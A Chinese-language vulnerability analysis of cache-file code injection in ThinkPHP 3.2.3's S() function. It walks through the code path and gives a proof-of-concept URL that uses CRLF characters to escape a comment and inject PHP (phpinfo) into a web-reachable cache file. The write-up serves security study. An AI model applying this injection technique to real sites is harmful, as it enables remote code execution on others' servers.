配置控制器Application/Home/Controller/IndexController.class.php
<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller
{
public function index(){
$data=I('get.data');
S('data',$data);
}
}
我们在浏览器访问http://127.0.0.1/thinkphp-3.2.3/?data=spring
发现生成缓存文件Application/Runtime/Temp/8d777f385d3dfec8815d20f7496026dc.php
缓存文件的名称8d777f385d3dfec8815d20f7496026dc就是S('data',$data);中data的MD5
代码分析
打断点进入S()方法
跟进写缓存部分的代码return $cache->set($name, $value, $expire);
文件名来自filename()函数,在有源码的情况下这是已知的
$data来自序列化之后的$value,$value可控
$data = serialize($value);
现在的$data是"s:6:"spring";"
接下来的这段代码是写入文件的关键
$data = "<?php\n//" . sprintf('%012d', $expire) . $check . $data . "\n?>";
$result = file_put_contents($filename, $data);
这里使用了file_put_contents()函数,另外写入的部分用了//注释符防止其被解析,但我们可以使用换行符等进行绕过
所以最终我们的POC为http://127.0.0.1/thinkphp-3.2.3/?data=%0d%0aphpinfo();%0d%0a//
0x0d - \r, carrige return 回车
0x0a - \n, new line 换行
Windows 中换行为0d 0a
UNIX 换行为 0a
因为ThinkPHP3的入口文件位于根目录下,和 application 等目录在同一目录下,导致系统很多文件都可以访问,跟日志泄露一样,这里生成的缓存文件也是可以直接访问的
访问http://127.0.0.1/thinkphp-3.2.3/Application/runtime/Temp/8d777f385d3dfec8815d20f7496026dc.php可见
缓存文件内容为
<?php
//000000000000s:16:"
phpinfo();
//";
?>
参考链接
END
建了一个微信的安全交流群,欢迎添加我微信备注进群,一起来聊天吹水哇,以及一个会发布安全相关内容的公众号,欢迎关注
